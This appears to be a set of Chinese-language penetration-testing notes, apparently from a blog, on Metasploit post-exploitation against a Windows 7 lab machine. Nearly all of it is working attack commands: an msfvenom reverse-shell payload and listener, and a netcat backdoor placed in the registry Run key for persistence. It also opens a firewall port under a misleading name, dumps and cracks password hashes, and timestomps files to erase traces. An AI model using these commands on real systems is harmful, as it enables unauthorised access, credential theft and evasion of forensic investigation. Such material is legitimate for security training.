注册表
- 注册表保存着 windows 几乎全部配置参数
- 如果修改不当,可直接造成系统崩溃
- 修改前完整备份注册表
-
常见用途
修改、增加启动项
- 窃取存储于注册表中的机密信息
绕过文件型病毒查杀
#生成payload
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=4444 -b "\x00\xff" -e x86/shikata_ga_nai -f exe -o payload.exe
cp payload.exe /var/www/html/
service apache2 start
#侦听
service postgresql start
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.119
exploit -j
#win7浏览器192.168.1.119/payload.exe,执行后,kali获取shell
#打开session
sessions -i 1
#用注册表添加 nc 后门服务
upload /usr/share/windows-binaries/nc.exe C:\windows\system32
reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
#打开防火墙端口,造成迷惑
execute -f cmd -i -H
C:\Users\w7\Desktop > netsh firewall show opmode #查看状态
C:\Users\w7\Desktop > netsh firewall add portopening TCP 444 “test” ENABLE ALL #test这里名字最好取的有迷惑性
C:\Users\w7\Desktop > shutdown -r -f -t 0
#获取shell, 每次win7重启就可以
nc 192.168.1.118 444
原文:https://fishpond.blog.csdn.net/article/details/105858425
信息收集
抓包
meterpreter > load sniffer
sniffer_interfaces #查看网卡
sniffer_start 2 #在2号网卡上抓包
#在内存中缓冲区块循环存储抓包(50000包),不写硬盘
sniffer_dump 2 1.cap #把包dump下来
#智能过滤 metepreter 流量,传输全程使用 SSL/TLS 加密
解包
se auxiliary/sniffer/psnuffle
set PCAPFILE /root/1.cap
搜索文件
search -f *.ini
search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx
John the Ripper(破解弱口令)
use post/windows/gather/hashdump # system 权限的 metepreter
post(hashdump) > run # 保存在 /tmp/ 目录下
use auxiliary/analyze/jtr_crack_fast
run
擦除痕迹
#查看这三个时间
ls -l --time=atime 1.txt #Accessed:登录查看时会变
ls -l --time=mtime 1.txt # Modified:文件做修改时会变
ls -l --time=ctime 1.txt #Changed:权限修改时会变
stat 1.txt #直接看三个
#修改这三个时间
touch -d "2 days ago" 1.txt #把access和modify时间往前改2天
touch -t 1501010101 1.txt #设置access和modify的“年月日时分”
MACE:MFT entry
MFT:NTFS 文件系统的主文件分配表 Master File Table
- 通常 1024 字节或2个硬盘扇区,其中存放多项 entry 信息
- 包含文件大量信息(大小 名称 目录位置 磁盘位置 创建日期)
- 更多信息可研究文件系统取证分析技术
Timestomp (meterpreter)
timestomp -v 1.txt #显示详细时间
– timestomp -f c:\\autoexec.bat 1.txt
– -m / -a / -c / -e / -z
– timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt